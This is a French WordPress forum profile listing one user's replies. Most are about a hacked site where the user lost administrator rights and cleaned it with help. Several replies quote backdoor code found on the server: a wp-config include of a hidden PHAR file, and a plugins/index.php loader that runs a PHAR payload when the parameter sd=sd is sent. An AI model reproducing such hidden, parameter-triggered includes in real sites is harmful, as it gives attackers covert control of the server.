floperret (Créer un compte)

Toutes mes réponses sur les forums

14 sujets de 1 à 14 (sur un total de 14)
  • Auteur
    Messages
  • en réponse à : [Résolu] Perte des droits administrateur #2400371
    floperret
    Participant
    Initié WordPress
    18 contributions

    C’est bon, j’ai réussi à régler le problème !

    Il restait une ligne étrange dans wp-config que je n’avais pas vue. Voici le code :

    include(‘phar:///www/missionspro/missionspro.unistra.fr/logs/2021/.missyou.ini/missionspro.php’);

    En la supprimant, j’ai à nouveau accès à mon rôle admin.

    Merci encore d’avoir pris le temps de m’aider ! Très bonne journée à vous

    en réponse à : [Résolu] Perte des droits administrateur #2400362
    floperret
    Participant
    Initié WordPress
    18 contributions

    Bonjour,

    J’ai bien supprimé la table. Mon fichier .htaccess n’était pas exactement comme celui dans l’article que vous avez envoyé, je l’ai donc modifié. Malheureusement, le problème reste le même..

    en réponse à : [Résolu] Perte des droits administrateur #2400327
    floperret
    Participant
    Initié WordPress
    18 contributions

    J’ai supprimé tous les fichiers suspects, et ai procédé à un scan avec sucuri qui m’en a donné 4 autres à supprimer également, tous créés à des dates similaires. Cela n’a cependant pas résolu le problème et il m’est toujours impossible d’avoir les droits admin..

    J’ai constaté dans ma base de données qu’il y avait une table « wp_wpfm_backup », dois-je également la supprimer ?

    Merci

    en réponse à : [Résolu] Perte des droits administrateur #2400315
    floperret
    Participant
    Initié WordPress
    18 contributions

    Dans le dossier principal, au milieu de tous les fichiers hors dossier, il y a un fichier « wp-kaylin.php » qui m’interpelle, je n’ai jamais vu ce nom et je n’arrive pas à l’ouvrir. C’est aussi le fichier le plus lourd de la liste, il fait 89 319 octets. Je l’avais déjà remarqué avant de réinstaller wordpress comme vous me l’aviez conseillé, je l’avais supprimé et j’ai l’impression qu’il a réapparu depuis.

    Je ne vois rien d’anormal dans wp-config.

    Dans wp-content, j’ai mes différents dossiers correspondant à chaque année, ainsi qu’un dossier « wp-file-manager-pro », ce qui m’étonne également puisque d’après mes recherches c’est un plugin, qui n’apparait pas dans la liste des plugins du site ni dans le bon dossier ici. La date de la dernière modification du dossier coïncide avec celle du fameux « wp-kaylin » cité plus haut. A l’intérieur de ce dossier, il y a un fichier .htaccess ainsi qu’un index.html vide.

    Le .htaccess contient juste ces lignes de code :

    <FilesMatch « \.(zip|gz)$ »>
    Order allow,deny
    Deny from all
    </Files>

    Dans mon dossier plugins, il y a un dossier pour chaque plugin, et juste un fichier index.php hors dossier, dont la date de la dernière modification coïncide encore une fois, et dont le code est le suivant

    <?php
    if($_GET[« sd »] == »sd »)
    {
    require(‘phar:///www/missionspro/missionspro.unistra.fr/conf/php/fisd.ini/filecontral-change2.php’);

    }
    // Silence is golden.

    Est-ce que certains de ces fichiers vous semblent louches ? Dans le reste du dossier wp-content, je ne vois autrement que des photos.

    J’ai aussi essayé de créer un nouveau profil administrateur depuis la nouvelle base de donnée, sans succès encore une fois.

    • Cette réponse a été modifiée le il y a 2 années et 1 mois par floperret.
    • Cette réponse a été modifiée le il y a 2 années et 1 mois par floperret.
    • Cette réponse a été modifiée le il y a 2 années et 1 mois par floperret.
    en réponse à : [Résolu] Perte des droits administrateur #2400282
    floperret
    Participant
    Initié WordPress
    18 contributions

    J’ai pu contacter un administrateur, qui m’a dit que la console qui s’affichait était un « rootkit », le site ayant été piraté. Il a réussi à restaurer une sauvegarde plus ancienne et la console a disparu. Malheureusement, je n’ai toujours pas accès au rôle admin, et il ne sait pas comment m’aider au delà de ça..

    en réponse à : [Résolu] Perte des droits administrateur #2400256
    floperret
    Participant
    Initié WordPress
    18 contributions

    Je viens d’essayer de réparer les tables, cela n’a rien changé.

    Dans l’onglet « santé du site », il est écrit que l’installation complète a une taille de 451,60 Mo, nous avons pourtant d’autre sites hébergés sur Renater avec une taille bien supérieure à ça et qui n’ont pas de souci

    en réponse à : [Résolu] Perte des droits administrateur #2400251
    floperret
    Participant
    Initié WordPress
    18 contributions

    Bonjour, et encore merci pour votre aide.

    Non, je ne suis pas en multisite.

    Je viens d’effectuer la deuxième possibilité, c’est à dire télécharger un nouveau wordpress avec remplacements des dossiers et fichiers, le problème persiste. Je ne dispose malheureusement pas de sauvegarde du site, ce n’est pas moi qui le gérais auparavant.

    A ma connaissance, il n’y a pas eu de modifications qui ont été faites sur le site récemment et qui auraient pu expliquer l’apparition du problème.

    en réponse à : [Résolu] Perte des droits administrateur #2400191
    floperret
    Participant
    Initié WordPress
    18 contributions

    Je n’en ai pas l’impression en tout cas. Sur PhpMyAdmin il est affiché que le total de mes 16 tables a un poids de 11,3 Mio

    Je n’ai malheureusement pas la possibilité de contacter un gestionnaire de réseau

    en réponse à : [Résolu] Perte des droits administrateur #2400186
    floperret
    Participant
    Initié WordPress
    18 contributions

    Je ne suis malheureusement pas en mesure de vous donner une réponse là dessus, j’ignore depuis quand cette perte d’accès a eu lieu et si elle coïncide avec la date du 9/04..

    Si cela peut vous éclairer, nous avions de base un thème enfant à Creativ Blog. Si vous vous rendez sur le site (https://missionspro.unistra.fr/) vous constaterez qu’une étrange console s’affiche dessus. Je suis sûre que celle-ci n’était pas présente le 07/04 en tout cas mais je ne saurai dire depuis quand exactement elle s’affiche, cela rejoint peut être le problème ? Lorsque je repasse au thème parent, la console disparaît

    • Cette réponse a été modifiée le il y a 2 années et 1 mois par floperret.
    en réponse à : [Résolu] Perte des droits administrateur #2400180
    floperret
    Participant
    Initié WordPress
    18 contributions

    Oui, ainsi que les thèmes, mais cela n’a rien changé.

    J’ignore si cela peut avoir un rapport ou non mais je me suis connectée en FTP et j’ai regardé les fichiers modifiés récemment pour voir d’où pouvait le problème. J’ai constaté que mon dossier themes était noté comme ayant été modifié récemment (le 09/04/2022, alors que je ne n’ai pas effectué de modifications). Quand je clique sur le dossier pour voir exactement quel fichier aurait été modifié, cette date n’apparaît nulle part, et tous les fichiers et dossiers sont notés comme étant modifiés l’année dernière. Se pourrait-il qu’il y ait un fichier « caché » qui pose problème à cet endroit ?

    en réponse à : [Résolu] Perte des droits administrateur #2400172
    floperret
    Participant
    Initié WordPress
    18 contributions

    Merci pour votre réponse. J’étais effectivement tombée sur le premier lien que vous avez envoyé, je n’ai pas trouvé les lignes « define(‘DISALLOW_FILE_EDIT’, true); » ni « define(‘DISALLOW_FILE_MODS’,true); »

    J’ai tenté d’ajouter manuellement la ligne define(‘DISALLOW_FILE_MODS’,false); comme le suggère le second lien, mais le problème persiste malheureusement.

    • Cette réponse a été modifiée le il y a 2 années et 1 mois par floperret.
    en réponse à : [Résolu] Perte des droits administrateur #2400168
    floperret
    Participant
    Initié WordPress
    18 contributions

    Bonjour, je vous remercie pour votre réponse.

    J’étais effectivement tombée sur ce topic et j’ai tenté de suivre votre solution. Les deux textes étaient très similaires mais pas parfaitement identiques (à la base, il y avait la valeur « a:61: », alors que sur awebvision, c’était « a:62: ». C’est la seule différence que j’ai constaté, j’ai donc collé le bon proposé sur awebvision mais cela n’a malheureusement rien changé.

    • Cette réponse a été modifiée le il y a 2 années et 1 mois par floperret.
    floperret
    Participant
    Initié WordPress
    18 contributions

    Bonjour,

    Merci pour votre réponse ! La case était pourtant bien décochée, mais j’ai finalement trouvé la solution en rentrant manuellement les paramètres, j’ignore pourquoi ça ne marchait pas de base. Problème réglé !

    en réponse à : Problème lors du déplacement de répertoire wordpress #2358577
    floperret
    Participant
    Initié WordPress
    18 contributions

    Bonjour,

    Je vous remercie pour votre réponse mais cela ne fonctionne malheureusement pas. J’ai déjà codé en dur dans wp-config.php en remplaçant le lien et ai modifié le fichier .htaccess.

    Vous me suggérez de rajouter /wordpress/ dans le fichier index.php mais je ne comprends pas pourquoi, puisque je souhaite justement que le site ne soit plus accessible depuis ce dossier mais depuis l’URL. J’ai également essayé de changer tout simplement le lien dans les réglages généraux dans le tableau de bord de wordpress mais cela a fait bugger mon site.

    Dois-je modifier quelque chose dans mon fichier .sql ?

    Merci d’avance pour votre aide

    • Cette réponse a été modifiée le il y a 3 années et 6 mois par floperret.
14 sujets de 1 à 14 (sur un total de 14)